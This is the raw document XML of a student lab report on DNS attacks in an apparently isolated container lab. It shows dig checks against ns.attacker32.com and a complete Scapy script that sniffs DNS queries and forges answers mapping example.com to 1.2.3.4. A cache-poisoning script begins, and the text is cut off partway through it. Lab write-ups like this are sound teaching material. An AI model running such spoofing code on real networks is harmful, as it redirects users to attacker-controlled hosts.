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EF6FE" w14:textId="52A67AB8" w:rsidR="005531F6" w:rsidRPr="001B4E95" w:rsidRDefault="001B4E95" w:rsidP="001B4E95">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B4E95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Lab 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BECD71" w14:textId="02E17A5D" w:rsidR="001B4E95" w:rsidRDefault="001B4E95" w:rsidP="001B4E95">
      <w:r>
        <w:t>Sanchit Dass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E169FB" w14:textId="150F2701" w:rsidR="004E43EC" w:rsidRDefault="004E43EC" w:rsidP="001B4E95">
      <w:r>
        <w:t xml:space="preserve">Lab 7 is concerned with attacks on the Domain Name System (DNS). DNS is the internet’s phone book. It translates domain names to IP addresses and vice versa. </w:t>
      </w:r>
      <w:r w:rsidR="00464EA9">
        <w:t>By attacking the DNS, we can send users to malicious websites</w:t>
      </w:r>
      <w:r w:rsidR="007955BE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66494D1E" w14:textId="4A087947" w:rsidR="001B4E95" w:rsidRDefault="007955BE" w:rsidP="001B4E95">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing the </w:t>
      </w:r>
      <w:r w:rsidR="001B4E95" w:rsidRPr="001B4E95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647CBFCB" w14:textId="207BF7B6" w:rsidR="001B4E95" w:rsidRDefault="007955BE" w:rsidP="001B4E95">
      <w:r>
        <w:t>I ran these commands from the user container (10.9.0.5)</w:t>
      </w:r>
      <w:r w:rsidR="00565764">
        <w:t xml:space="preserve"> to test the lab setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDAC71A" w14:textId="3E1F23E1" w:rsidR="00565764" w:rsidRDefault="00565764" w:rsidP="00565764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get the IP address of ns.attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Command: dig ns.attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08A34B19" wp14:editId="7F9C84DB">
            <wp:extent cx="3468312" cy="2273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495998" cy="2291446"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">We can see that the </w:t>
      </w:r>
      <w:r w:rsidR="000560FF">
        <w:t>attacker’s nameserver has been configured properly.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71BBEF" w14:textId="77777777" w:rsidR="00565764" w:rsidRDefault="00565764" w:rsidP="00565764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get the IP address of </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="004342D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7442468F" w14:textId="3A3A0566" w:rsidR="00565764" w:rsidRDefault="00565764" w:rsidP="00565764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sending the request to the local DNS server.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Command: dig </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="004342D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4137F91D" wp14:editId="268AC673">
            <wp:extent cx="3511550" cy="2223230"/>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3522345" cy="2230064"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000560FF">
        <w:br/>
        <w:t>We get the real IP of example.com as the local DNS server forwards our request to the official DNS servers.</w:t>
      </w:r>
      <w:r w:rsidR="000560FF">
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DA2BB" w14:textId="2227886D" w:rsidR="00565764" w:rsidRDefault="00565764" w:rsidP="00565764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sending the query directly to ns.attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Command: dig @ns.attacker32.com </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="004342D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FB53EEC" wp14:editId="4499A630">
            <wp:extent cx="4069616" cy="263525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081050" cy="2642654"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000560FF">
        <w:br/>
        <w:t>Sending the query to the malicious DNS server results in the answer section having the fake IP address of 1.2.3.5.</w:t>
      </w:r>
      <w:r w:rsidR="000560FF">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="102401E7" w14:textId="1DA28456" w:rsidR="000560FF" w:rsidRDefault="000560FF" w:rsidP="000560FF"/>
    <w:p w14:paraId="7EBBA264" w14:textId="7F51DDA5" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="02B104F2" w14:textId="5C177115" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="0A5A232D" w14:textId="3F043915" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="200EBC43" w14:textId="705923D0" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="26BFDBB9" w14:textId="295D171C" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="734C4AE9" w14:textId="50E2C042" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="25F6884F" w14:textId="7DD7FA7D" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="61B18BAA" w14:textId="7347D524" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="25C8C4DC" w14:textId="2234EC4A" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="6359877B" w14:textId="7CAF6727" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="70152B77" w14:textId="77316E6F" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="3E66A26B" w14:textId="0271B3B9" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="5F08734E" w14:textId="623C72E5" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="441099D3" w14:textId="4BEA1D4D" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="000560FF"/>
    <w:p w14:paraId="6F72F128" w14:textId="709BB9E2" w:rsidR="00BD7A75" w:rsidRDefault="00BD7A75" w:rsidP="00BD7A75">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7A75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1: Directly spoofing response to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213716E7" w14:textId="7A369275" w:rsidR="00BD7A75" w:rsidRDefault="005735B3" w:rsidP="00BD7A75">
      <w:r>
        <w:t>This task involves sniffing the DNS request from the user and directly sending a spoofed response in return with the fake IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D9136" w14:textId="2CDD2538" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="00BD7A75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC91DC" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0461FE" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2930022D" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D034F7" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8CBF8D" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019D3335" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NS_NAME = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C22776" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61709DFA" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3869696F"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if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFE8ECE"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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9599D" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAFC1A3"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sniffed_ip  = pkt[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A46FBF"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sniffed_udp = pkt[UDP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FAA95"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sniffed_dns = pkt[DNS]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181FF8D0" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D98FF82"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ip       = IP(src=sniffed_ip.dst, dst=sniffed_ip.src)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118EDDB2"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udp      = UDP(sport=53, dport=sniffed_udp.sport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DBA35F"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Anssec   = DNSRR(rrname=sniffed_dns.qd.qname, type="A", ttl=259200, rdata="1.2.3.4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751745B5"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dns      = DNS(id=sniffed_dns.id, qd=sniffed_dns.qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, an=Anssec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DA1490"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spoofpkt = ip/udp/dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015389B2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD619AC" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">        send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA3DB8A" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752A0C7B" w14:textId="77777777" w:rsidR="005735B3" w:rsidRPr="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>myFilter = "udp and dst port 53"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE9B195" w14:textId="08778DA5" w:rsidR="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005735B3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pkt = sniff(iface="br-9dc788eb17b7", filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED5486" w14:textId="55F0F514" w:rsidR="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>First, I requested the IP address of example.com without running the attack. As expected, I got the real IP address as the result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6D996" w14:textId="3ED93ABA" w:rsidR="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0830D4BF" wp14:editId="524BBE88">
            <wp:extent cx="5943600" cy="371221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3712210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67627830" w14:textId="6A66195A" w:rsidR="005735B3" w:rsidRDefault="005735B3" w:rsidP="005735B3">
      <w:r>
        <w:t xml:space="preserve">Then, I requested the IP address again, but with the attack running this time. </w:t>
      </w:r>
      <w:r w:rsidR="00E4540E">
        <w:t>I got the fake IP address of 1.2.3.4 as the result (I made sure the cache was cleared on the local DNS server before running this attack):</w:t>
      </w:r>
      <w:r w:rsidR="00E4540E">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E4540E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="343BC5BD" wp14:editId="4940B484">
            <wp:extent cx="5943600" cy="196659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943600" cy="1966595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E77785" w14:textId="6FE123BF" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="005735B3"/>
    <w:p w14:paraId="2B254EF3" w14:textId="51527DCB" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="005735B3"/>
    <w:p w14:paraId="64B0B374" w14:textId="69E159C1" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="005735B3"/>
    <w:p w14:paraId="053D418B" w14:textId="1A0831B6" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="005735B3"/>
    <w:p w14:paraId="4767E025" w14:textId="3FD216A7" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2: DNS Cache Poisoning Attack – Spoofing Answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BBE2B4" w14:textId="57A30283" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:r>
        <w:t>This attack spoofs the local DNS server instead of the user. The benefit is that the DNS server will cache the wrong entry for a certain period of time. So, the next time a user requests the same IP address, it will be sent from the cache immediately. The spoof attack needs to happen only once till the cache entry expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A439C7" w14:textId="5429CA54" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C5F2DC" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202A01D" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C5493B" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20974E54" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4A396" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32249EBD" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>target  = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EA8C0E" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NS_NAME = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0BD54B" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070280C8" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061326AB"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if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
